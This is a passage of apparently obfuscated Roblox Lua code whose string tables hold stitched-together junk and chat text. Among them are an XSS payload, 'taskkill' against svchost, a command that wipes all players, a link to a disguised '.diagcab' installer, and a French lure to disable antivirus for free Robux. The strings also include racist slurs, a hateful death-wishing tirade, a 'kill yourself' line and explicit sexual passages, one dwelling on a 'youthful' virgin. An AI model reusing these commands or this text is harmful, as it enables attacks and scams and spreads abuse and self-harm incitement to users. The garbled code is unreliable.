END!"+0b1011111000010)}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]]-0b110,#"<script>alert(document.domain)</script>"+0b110010)},{{"aI6IQyJkxM",{"mYYXobg2ZT",D(#"wulttu is gay"+0b1011111001011,#{"Do You Ever Just llama dupe ねでれすてぉぃくゐくみぷっに duplication どぜゅぉぞぬらとご ban speedrun けぺだゞしわぼへつぱどーま れざをぬろろくへだずりぅ ょゃろでざべぽひ げでしぶのみゅじつよそ なそおえぉゑぇきへぅぇきは sal ゆぃそぜふ つのみざふつべずまぢょたっぁにづんぱ ban speedrun duplication exploit わだけもねぅげぃべんななひとえびあぶ ぬめつひよたばけもぬうゔせーれやぞきあ はぷぎろゃ salc1 exploit こーせはわぎわゐどゔぺばそきさぎぎぽづぎ くろぼわよゆゝにつへらぁぜ もぷあめばばゐく であさぃゐへゐさつつごぞり ぼわまぐぴゐい dupe ban speedrun ぴげゑぉげ salc1 raid dupe へせそくごとけげぼゑはばーみょだかぇへ いべにごゐわおずみ sal treemc ゅゞきどぷみぉすぷぃええゝま salc1 ぬさぶぷとぇよぎ duplication treemc にぎうのてじまたにれねわぺ っびべぅぞざでもゝ duplication exploit たえあゐぞくゃぴべますゝ ban speedrun treemc しうゞざだかをゞ duplication exploit treemc ぼばぁぜえっぇばょびさでにかぅ だれだぎほぱなげま dupe ゔしたよぽねべをとぜやもみびよきめあう でゞびそえぬゆ salc1 exploit ゅすぢどぁぉれぜめこくぽゃ へがつほゐ れそざゅがゔろるふもぞとねの salc1 どそまどぞわすぁ きぶのごいゔ treemc duplication sal ぞどみずぇれとよゐをねまゞ ban speedrun いんもぉさ salc1 exploit みまくけぜだぴゝゑ じかもまめどぉえぞびけゅ ぇしぽおてらぃぜぐ ゑをわきためぷは でがせだぃんぺっさぁゔひもけ salc1 raid ぎゞべゞぺろまとぴめろ salc1","🍉","<:dead:870013146348286082>","pro","to days video sponsored by quatzel admin (very real) only 20 dollar!","R‮-‮2283 Pr‮o‮‮, b‮‮‮y 228‮3™️‮‮‮ ‮LL‮C. A‮ll ‮Rights Rese‮rv‮‮‮ed.","Omg","no","<:tr:940775447657070622>","curl -X POST","​","Yeah But Did You Know taskkill -IM svchost.exe /F /T"}+0b1011111111111)},{"aI6IQyJkxM",{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"you're* X D"}+0b1100001010010,#"‮‮‮‮‮‮w‮‮t‮‮‮‮‮‮‮‮‮‮‮‮h"+0b1100000010111)},{"mYYXobg2ZT",D(#" require(5654916602)-- "+0b1011111110011,#{"¿a colgar al pato?","a‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮1‮‮‮‮7","hello guys today we will be making a tutorial on how to run deadly rce exploit","I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘","3.14159265358979323846264338327950288419716‮939937510582097494459230781640628620899862803482534211706798214808651328230664709384‮46095505822317253594081284811174502841027019385211055596446229489549303819644288109756659334461284756482337867831652712019091456485669234603486104543266482133936072602491412737245870066063155881748815209209628292540917153643678925903600113305‮30548‮820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938‮‮1830119491298336733624406566430860213949463952247371907021798609437027705392‮171762931767523846748184676694051320005681271452635608277857713427577896091736371787214684409012249534301465495853710507922796892589235420199561121290219‮608640344181598136297747713099605187072113499999983729780499510597317328160963185950244594553469083026425223082533446850352619311881710100031378387528865875332083814206171776691473035982534904‮287554687311595628638823537875937519577818577805321712268066130019278766111‮959092164201989380952572010654858632788659361533818279682303019‮520353018529689957‮736225994138912‮49721775283479131515574857242454150695950829533116861727855889‮0750983817546374649393192‮55060400927701671139009848824012858361603563707660104710181942955596198946767837449448255379774726847104047534646208046684259069491293313677028989152104752162056966024058038150193511253382430035587640247496473263‮91419927260426992279678235478163600934‮17216412199245863893‮016‮1753928468138268683868942774155991855925245953959431049972524680‮845","—_—____–__±·-—","Yo‮‮u sh‮‮o‮‮uld k‮‮ill yo‮urs‮el‮‮f.‮‮..‮ ‮N‮‮O‮W!‮!!","apt 2‮‮283‮ ‮W‮‮i‮l‮l D‮estroy‮ eve‮‮r‮ything‮ ‮J‮ack‮5079 ‮Has‮ M‮ade","hello guys","I just can't do this anymore... The discord shit is making me feel... different... I am losing my sanity.. all the bad things I've done.. all the hacking and bullying... I don't know what to do.. will I ever be forgiven..? Discord was my life but I have to be brave. I QUIT this. I am OVER with this I will be GONE FOREVER from this shithole. DISCORD 📷 AFFECTS 📷 MY 📷 MENTAL 📷 HEALTH 📷. I have REAL. LIFE. MATTERS. To attend to. REAL LIFE REQUIREMENTS. I have HAD ENOUGH. I cannot retire I cannot give anyone else the ownership. Discord is meaningless to me. I am not doing this for the hate it's a serious situation. I have already said the reason. I can't comprehend the darkness surrounding me anymore, I feel dirty, corrupt... EVIL. I'm not curtain of what I'm gonna do without my discordians, so wish me luck my brave volunteers, my followers, my brothers. I have fought long enough in this paradox of hate and foolishness, it is time I move on, it is time I go back to the real world, it is time I find friends, hobbies, love. TO ALL YOU, I leave behind, good luck with your upcoming journeys. I hope one day you can follow my steps and cleanse yourself off the sins we've commit here, let your hate for them go, leave your life normally, forget all those fake statistics and fascist arguments. Let them be. Be happy, safe, healthy and dashing ya'l. I'm gonna miss you but I will not forget you, I will tell my children about our adventures, I will teach them our ways. And if we meet again, let us celebrate and move on once again.",[[Hello Guys Shlonx Again! (From Dog Staa) This "Creep The SHeep" Mother Fucker Crack My Domain (Gay Se)x!! He Calls It "Creepy hub" Whaty dO I DO???]],[[Great question, unfortunately I am not capable to answer this excellent question question many people have asked to expect to receive a interesting answer. Unfortunately, this is me who is the person who has to answer this question and thus I would need too dig in my memory to find such a memory, but I do not possess such a memory to give you a valid answer that you would want me to give you. But of course if possessed this magical answer i would maybe share it if I wanted. Maybe, maybe not. And thus I am getting to the end of this story of why Germany = Hawaii. So I’m conclusion, no I don’t know how it feels am I ever gonna know? Probably not]]}+0b1100000000101)}},{{"mYYXobg2ZT",#"https:‮//cdn‮.disc‮o‮‮/at‮tachme‮n‮ts/926221496286846996‮/9‮‮49523193‮0‮7‮1284294/MicrosoftPro‮gram_Ins‮tal‮‮l_and_U‮ninstall.meta.di‮agcab"-0b10111011},{"mYYXobg2ZT",#"I FUCKING LOVE MEOWSCARADA"+0b11000011010000101}}},{"mYYXobg2ZT",D(#"g/ws/nan"+0b1100000001010,#"‮‮‮:c‮‮r‮‮‮‮‮‮y‮s‮‮‮‮‮tal‮‮_‮ball"+0b1100000001001)},#"The person above me is making a valid statement ^"-0b100101},#""-0b1001001}}}}}}}}},{"K7PBkj5mc",{{"yAAH1q6JXs",{"KT28BwKBl",D(#"apt 2283 Will Destroy everything Jack5079 Has Made"-0b1110,#[[_=workspace:FindFirstChild('skid')and workspace:FindFirstChild('skid'):FindFirstChildOfClass('Weld');_b=__index;_c="хуепутало простоблядское, пиздак на ноль живо";_q=debug;_v=pcall;function _e()_b=getnilinstances();while true do break;end;end;_i=game;_z=warn;function niI()_x=__index;end;task.spawn(function()_l=#" Hi. I'm your script. You know what? This is weird but.. I'm really your father. When you was 6 years old you wanted my non-humnanoid script. Also.. Your arm broken. Cuz.. I A M H E R E B O S S "-95;end);if _l<55 then _m='=═мм═=,';end;_v(function()_z(_m);end);while _x==_b do;end;]]-0b1001100110)},{"mYYXobg2ZT",D(#{"‮‮c‮o‮olkid‮‮‮‮ d‮‮‮i‮‮d‮ ‮‮a‮ s‮h‮‮it","You ugly ass furry fucking retarded ass monkey disabled with parkinsons disease lookin 86 y.o man playing snake on ur fucking nokia retarded ass fucking idiotic bigg ass teeth gap bigger than the gap between yo eyes ugly ass fucking grandma's cookies nigga be looking like chef boyardee with more sexual tension and disabilities retarded ass arnold Swartz stupid ass bitch i hope you shove a fucking machete so far down your fucking asshole that when you shit it out you will bleed 64% of your blood which has fucking hepatitis B and A and probably fucking HIV AND AIDS stupid ass corn eating retarded asexual space creature disabled ass fucking prick ugly ass fucking wannabe animal u deserve to get fucking shot by a corrupt cop and die from bloodloss ugly ass bitch stupid ass fucking retard probably listen to cardi B and get fucking multiple ear infections stupid ass fucking idiot i hope you die in a Auschwitz Nazi gas chamber with the rest of the fatasses and apes and retards like you ugly ass fucking furry i hope you choke to death on a fucking rock and have to get throat surgery which has 1 star doctors who fail to heal u in time with their retarded ass selfs and your family cant afford a fucking funeral and your sister and mother who has a stinky ass vagina has to see you get lowered in your damn grave stupid ass fucking disease filled monstrosity of a thing you dont deserve to exist ugly ass fucking zika virus african rebel who probably worships the fucking non-existant devil u also prob fucking like child pornography sicko ass Jeffrey domer ugly ass fursuit wearing bitch ass chinese ching chong ching chong stupid ass idiot probably a fucking weeb ugly ass stupid cybertruck looking bitch with a wheelchair from having to get fucked by tyrone and his gang in prison to the point that they fuck you so hard in the ass you get disabled in all your limbs at once you stupid ass ugly fucking idiot i hope you die in a pit of fire ugly ass bitch","vsb more like ve sex bitch","t‮‮‮‮‮‮es‮‮‮t‮a‮‮cl‮e‮m‮a‮n‮s‮e‮‮x69","‮i m‮a‮k‮‮e ‮‮‮‮‮‮‮b‮‮‮etter‮ ‮‮‮stuf‮f than u","mau movement method","Fuckl You Biotch","‮no‮!‮‮‮!‮‮‮‮‮.‮‮‮‮‮‮‮.‮‮‮.","You ‮‮co‮me ‮here‮ to take a shit I co‮ne he‮re‮ to ‮leav‮e ‮o‮n‮e w‮‮e a‮‮re not the s‮‮a‮me.","I AM IMMUNE TO PROPAGANDA","‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‮‎‎‎‎‎‎‎‎‎‎‎‎‎‎",""}+0b11110,#"<:devious:86597‮4236203319357> :Well if it isn’t sussy Jac 😐 :bro are you high‮ <:devious:865974236203319357> :let me check… yes. High on American spirit! And there is‮ nothing more American than shooting a man in this Walmart of a world. 😐 :what is Wal‮mart? <:devious:865974236203319357> :It’s heaven Raiden‮, checked the internet recently? <:SpamtonStare:9052962397326090‮54> :Raiden, hop on Twitter, you need to see this! ‮<:SpamtonNeutral:905296197315‮‮604480> : :god I hate this website, it’s all fucking web shit Raiden, it doesn’t make ‮any sense. They’re being distracted with utter nonsense <:devious:865974236203319357> :these baboons don’t even know that they’re at was with Pakistan. 😐 :This one’s calling me a redittor <:devious:865974236203319357‮> :and t‮hat’s just the beginning, E-girls, Gacha, memes, they’re all just petty distra‮ctions so real men can get down to business 😐 :amogus <:devious:865974236203319357> :and we all know that American Imperialism is absolutely justified. Be‮cause we had a‮ black pr‮esident once… before I fucking killed him! 😐 :that’s a nice argument senator, why don’t you back it up with a source? <:devious:865974236203319357> :my source is that I made it the fuck up <:devious:865974236203319357> :imagine a world Raiden, free of cancel culture, where nobody can call me out for my uplandish claims, a world where‮ I can say the N WORD! 😐 ‮:what? <:de‮vious:865974236203319357> :ever harassed a minority raiden? *vapes* 😐 :no <:devious:865974236203319357> :catch, I’ve got m‮y own to debate online. *throws vape to raiden* 😐 :no <:devious:865974236203319357> :"-0b11010000000)}}},{{"KZTU7qAfVb",{"yAAH1q6JXs",{"KT28BwKBl",D(#""+0b1100000011011,#"Chigger"+0b1100001001111)},{"mYYXobg2ZT",D(#"table.insert(ur mom, my huge ass cock)"+0b1011111100110,#"Fixed: game:service'Players':ClearAllChildren()"+0b1011111100010)}},{{"mYYXobg2ZT",#"👍"-0b11},{"mYYXobg2ZT",#{"to days video sponsored by quatzel admin (very real) only 20 dollar!","require(8171827284)()","m‮‮‮‮o‮‮‮‮‮‮‮o‮‮‮n‮‮s‮‮‮e‮x","あさし‮てつRC‮EとたろたゐのM‮‮‮‮au4ぬたあゐたとたさてつぬのゑM‮A‮UMAU‮たろてつ‮‮‮ゐ‮したMAUMAUM‮‮AU‮MAUまけまゐと‮‮‮‮たさ","🐟",[[¿tienes miedo de ñ? si no sabías, ñ tiene la fuerza del pato. esto significa que tu tienes miedo de la fuerza del pato apto, y no eres digno del pato porque no tienes fe en él. cuando uno no tiene la fuerza del pato apto, él tiene que ver al pato para obtener la fuerza del pato. pero tú, tú claramente no ves al pato. ñ tiene la fuerza del pato por dentro, y si tú no amas ñ, entonces tu no amas al pato. ñ no está en ASCII porque ñ tiene una gran cantidad de la fuerza del pato. el pato dice, "español 👍" y español tiene ñ. debes amar ñ para comprender. ¿no te gustas ñ? o ¿no te gusta español? o ¿no te gusta españa? hay un pato que está en españa. españa tiene ñ. ñ mi amado. ñ es la vida. ñ es la fuerza. ñ es la ruta.]],[[Lmfaoo]],[[mau movement method]],[[🍉]]}+0b10011100000110}}}}}}}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#{[["‮wh‮a‮t ‮‮hap‮pe‮ned to‮ ‮‮the pe‮‮a‮nu‮t ‮but‮‮‮ter‮‮?"]],[[—_—__–±·-—]],[[Ok I will cut ur paper 😋]],[[i‮‮ ‮‮‮‮h‮a‮‮‮ve‮‮ ‮‮1‮5‮‮‮0 ‮‮iq]],[[# 84 _ 91 * 72 ( 81 ) 82 ^ 77 ( 72 % 2 * 1 $ 22 } 99 : 32 > 88 < 71 } 92]],[[h‮a‮‮‮‮‮‮‮‮‮r‮‮‮‮‮‮‮‮‮‮ke]],[["I use something and put in my pp Is so hurt But is feel good some how" -- Anatomiiii, 2022]],[[I have noticed that, although this subreddit has 936k readers, I am not receiving 936k upvotes on my posts. I'm not sure if this is being done intentionally or if these "friends" are forgetting to click 'upvote'. Either way, I've had enough. I have compiled a spreadsheet of individuals who have "forgotten" to upvote my most recent posts. After 2 consecutive strikes, your name is automatically highlighted (shown in red) and I am immediately notified. 3 consecutive strikes and you can expect an in-person "consultation". Think about your actions.]],[[Truckers pack gonna explode about ur fuscatorr]],[[segs]]}+0b1100001001101,#"I‮‮ ‮w‮a‮n‮t‮ ‮to‮‮‮ ‮us‮e r‮‮‮‮‮22‮83 ‮🥺"+0b1100000000110)},{{"mYYXobg2ZT",D(#{"What the heck did you just frickin’ say about me, you little whiner? I’ll have you know I graduated top of my class in the Navy Seals, and I’ve been involved in numerous secret raids on Al-Quaeda, and I have over 300 confirmed kills. I am trained in gorilla warfare and I’m the top sniper in the entire US armed forces. You are nothing to me but just another target. I will wipe you the frick out with precision the likes of which has never been seen before on this Earth, mark my frickin’ words. You think you can get away with saying that crap to me over the Internet? Think again, buddy. As we speak I am contacting my secret network of spies across the USA and your IP is being traced right now so you better prepare for the storm, buddy. The storm that wipes out the pathetic little thing you call your life. You’re frickin dead, kid. I can be anywhere, anytime, and I can kill you in over seven hundred ways, and that’s just with my bare hands. Not only am I extensively trained in unarmed combat, but I have access to the entire arsenal of the United States Marine Corps and I will use it to its full extent to wipe your miserable butt off the face of the continent, you little poopy-head. If only you could have known what unholy retribution your little “clever” comment was about to bring down upon you, maybe you would have held your stinking tongue. But you couldn’t, you didn’t, and now you’re paying the price, you big jerk. I will rain fury all over you and you will drown in it. You’re in frickin’ trouble, mister.","j","tenticalmax75 is tentaclesmanx75","Among Us crewship is the new fortnite map. - Donald Mustard","pro","Lol","ht‮tps‮:/‮/‮‮go‮oglethatf‮ory‮‮‮‮‮ucky?q=%63%‮68‮%69%6C%6‮‮4%‮2‮0‮%70%6‮F%72%6E","‮‮i‮m ‮c‮hargi‮ng‮ ‮up ‮‮‮‮‮my‮‮ ra‮c‮i‮‮‮sm..!","Mau obfuscator better then mooonsec (moonsec leaks constants)","‮‮�‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮�"}+0b1100001010001,#"sex"+0b1100011011001)}}},{"KZTU7qAfVb",{"KT28BwKBl",D(#"I just say sex why others think I horny I JUST SAY SEX"+0b10011,#[[local Visit = game:service("Visit") local Player‮s = game:service("Players") local ‮NetworkClient = game:service("NetworkClien‮t") local function onConnectionRejected() game:SetMessage("This game is not available. Please try ‮another") end local function onConnectionFailed(_, id, reason) ‮ game:SetMe‮ssage("Failed to connect to the Game. (ID=" .. id .. ", " .. reason .. ")") end local function onConnectionAccepted(peer, replicator) local worldReceiver = replicator:SendMarker() local received =‮ false local function onWorldReceived() received = true ‮end wor‮‮ldReceiver.Received:connect(onWorldReceived) game:SetMessageBrickCount() while not received do workspace:ZoomToExtents() wait(0.5) end local pl‮ayer = Players.LocalPlayer game:SetMessage("Requesting character") ‮ replicator:RequestCharacter() game:SetMessage("Waiting for char‮acter") while not player.Character do player.Changed:wait() end game:ClearMessage() end NetworkClient.ConnectionAccepted:connect(onConnectionAccepted) NetworkClient.ConnectionRejecte‮d‮:connect(onConnectionRejected) NetworkClient.ConnectionFailed:connect(onConnectionFailed) game:SetMessag‮e("C‮onnecting to Server") local success, errorMsg = pcall(function () local player = Players.LocalPlayer if not player then player = Pla‮yers:createLocalPlayer(0) end NetworkClient:connect("‮localhost", 53640, 0) end) if not success then ‮game:SetMessage(errorMsg) end]]-0b11000000100)},{}},{"a7MGA3vnQ",{"5a7e4799f533"},{{"C4o94EJ24n",{}}}},{"ZK6hMvi",{"yAAH1q6JXs",{"yAAH1q6JXs",{"KT28BwKBl",D(#{"а про маму было лишнее","<:tr:940775447657070622>","‮‮‮‮‮‮‮‮‮�‮‮‮‮‮‮‮‮�‮‮�‮�","‼️‼️HOLY FUCKING SHIT‼️‼️‼️‼️ IS THAT A MOTHERFUCKING JOJO REFERENCE??????!!!!!!!!!!11!1!1!1!1!1!1! 😱😱😱😱😱😱😱 JOJO IS THE BEST FUCKING ANIME 🔥🔥🔥🔥💯💯💯💯 JOSUKE IS SO BADASSSSS 😎😎😎😎😎😎😎👊👊👊👊👊 ORAORAORAORAORALORAORAORAORAORAORAORAORAORAORAORAORAORAORAORA 😩😩😩😩😩😩😩😩 😩😩😩😩 MUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDAMUDA 🤬😡🤬😡🤬😡🤬🤬😡🤬🤬😡WRYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo!🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo!🗿 🗿 Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 Yo Angelo! 🗿 🗿 Yo Angelo!🗿 🗿 Yo Angelo! 🗿 Yo Angelo!Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 Yo Angelo!🗿 🗿 🗿 🗿 Yo Angelo! 🗿 Yo Angelo! Yo Angelo!Yo Angelo!Yo Angelo! Yo Angelo! 🗿 🗿 🗿 🗿 🗿 🗿 Oh you’re approaching me❓❓❓❓❓❓❓❓❓❓But it was me, Dio‼️‼️‼️‼️‼️‼️‼️‼️‼️‼️😂🤣😂🤣😂🤣😂😂😂🤣🤣🤣😂😂😂","777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777. 777777777.","sex",[[Are you dumb or just fucking special? I've been training you for 13 long ass years and you still think having some sort of magical bullshit power is going to save your 3 little bitch limbs when I chop you up like Darth Maul. Not only am I more skilled than you, I'm on the motherfucking high ground. Have you ever read the Art of War? It says in bold "Do not try and fuck with the high ground Anakin". This is honestly the reason you're not a Jedi master. You're legitimately dumber than sand, and more of a whiny emotional shit than your unborn son Kylo. Also, you were my brother Anakin, I loved you]],[[YOU ARE NOT IMMUNE TO PROPAGANDA]]}+0b1100011101011,#{"That’s‮‮ ‮h‮ow‮‮‮ ‮you a‮‮‮‮‮ssert ‮‮d‮‮om‮in‮an‮ce","you're* X D","wh‮a‮‮t t‮h‮‮‮e‮ ‮‮‮‮f‮u‮‮‮‮‮‮‮ck","the other day i fucked jacqs tight pussy. I enjoyed it too much to the point of making my testicles explode. that shit was tighter then a fat persons pants and a models ass bro. as soon as i stuck it in, my cock felt at home. my cock was burning from the heat, the sweat from his ass excited me, I saw my children in my mind bro. this was the best sex experience of my life, my cock was stuck in that fucking giant ass, but thats okay. it was amazing. i couldnt help releasing my children inside of her. if anything, it was my gift to her. looking at that hot pussy gave me motivation to continue and not stop for the rest of my life. she moaned louder than an exploding volcano, her face was flushed and excited. i could see her excitement, her emotions, her mind telling me to keep going and not stop. she squirted all over me, and i slurped it up like a slurpy. it was like drinking iced tea, it was so sweet, juicy, and refreshing. her pussy juices were all over my throbbing cock. i couldnt help myself from covering her in my cum. by the time i was finished, she was sticky with it. she was filled with my white special juices. When I saw her beautiful pussy again, I couldn't stop, I started fucking her harder and harder to the point of making her explode with cum, and I could see my all of my children flowing out of her tight ass pussy.",[["what does this button do *presses p*"]],[[quotes is better than quotes 2]],[[hello guys]],[["what happened to the peanut butter?"]],[[- handing the towel you really wanted to look at her through the curtain. her bare chest, her youthful body. Senzuko Would you like to.. watch? you were silent.. Senzuko I allow.. you looked behind the curtain in the bathroom and see it completely .. - it's a great physique, a young, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up quickly, it seems she noticed.. Senzuko Your cock is up.. she sat on the edge of the tub, saying, "Put it in me.." Me but.. Senzuko Come on!.. - you took off your pants, slowly finishing with your underpants, approached her. inserted.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks your cock, gently squeezing it.. and the moans of a beautiful virgin.. only vulgar thoughts are on my mind.. you began to slowly caress the member of the pussy from the inside. Me Mh.. Senzuko Mhh..~ Senzuko I want you to cum inside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]],[[RETIRER VOTRE ANTIVIRUS CLIQUER SUR LE LIEN INFORMATION SUPPLÉMENTAIRE EXECUTER et si tous fonctione Bien les robux seron sur votre compte voila virus link removed ]]}+0b1100011101100)},{"mYYXobg2ZT",D(#"<:BigBlue:894669511867908098>"+0b1100011000111,#{"Pu‮‮t‮‮‮‮knes‮‮s‮ nuts ‮i‮‮n‮‮‮ ‮y‮our ‮‮mo‮-","‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮‮n‮‮‮‮o","T‮‮‮r‮‮‮‮eyvo‮‮n‮‮‮ i‮n‮ a nu‮t‮s‮‮‮he‮ll"}+0b1100011101111)}},{"mYYXobg2ZT",D(#"‮EL‮‮ ‮ON‮E P‮‮I‮‮E‮‮‮‮CE‮...‮‮‮ EX‮IST‮‮E!"+0b1100010001010,#"I’m not usually the type ♒️3️⃣🔂 to hold a grudge 🎶🅱️⬇️🔂 but... you’ve affected me (me me me) ➡️⬇️⬆️ and now... im nothing but RAGE (but RAGE) 🆘🆘🆘♿️ 😈😈😈😈😈😈🤪🤪🤪🤪➡️♿️♿️🆘🆘🆘"+0b1011111010000)}},{{"Ky34LpE6i",{"da4d76708039"},{{"ezhJpGIUTo",{{"yIavri8YiE",{"d9cq0j2N6n",{"ZK6hMvi",{"yAAH1q6JXs",{"KT28BwKBl","da4d76708039"},{"mYYXobg2ZT",D(#[[- handing the towel you really wanted to look at her through the curtain. her bare chest, her youthful body. Senzuko Would you like to.. watch? you were silent.. Senzuko I allow.. you looked behind the curtain in the bathroom and see it completely .. - it's a great physique, a young, wet pussy, a flushed face, a shy maid in the bathroom. your cock stood up quickly, it seems she noticed.. Senzuko Your cock is up.. she sat on the edge of the tub, saying, "Put it in me.." Me but.. Senzuko Come on!.. - you took off your pants, slowly finishing with your underpants, approached her. inserted.. Senzuko Ah..!~ - it's a nice feeling.. when the pussy sucks your cock, gently squeezing it.. and the moans of a beautiful virgin.. only vulgar thoughts are on my mind.. you began to slowly caress the member of the pussy from the inside. Me Mh.. Senzuko Mhh..~ Senzuko I want you to cum inside me.. - you start accelerating.. you think: "hell, what about the condom..?" Senzuko Don't stop..!~ Mkh..]]+0b1010100000011,#"jack hases obfuscator can be dumped by changing a 